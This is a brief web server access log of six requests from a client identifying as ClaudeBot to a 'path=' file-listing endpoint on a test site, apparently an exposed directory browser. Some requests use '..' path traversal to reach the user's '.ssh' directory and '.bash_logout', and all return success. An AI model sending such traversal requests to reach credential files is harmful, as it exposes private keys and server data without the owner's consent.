216.73.216.46 - - [21/Aug/2025:07:21:48 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2F..%2F.ssh HTTP/2.0" 200 1395 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 73 0.003 "5936" "0.002" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:51 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2F..%2F.bash_logout HTTP/2.0" 200 1013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 77 0.004 "2703" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:54 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fguzzlehttp HTTP/2.0" 200 1410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 95 0.003 "8322" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:57 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fwebmozart HTTP/2.0" 200 1368 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 94 0.004 "6325" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:22:00 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.%2Frun HTTP/2.0" 200 1362 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 65 0.003 "5796" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:22:03 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F92fd50c HTTP/2.0" 200 1481 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 102 0.003 "8646" "0.004" "test.newsite.space"
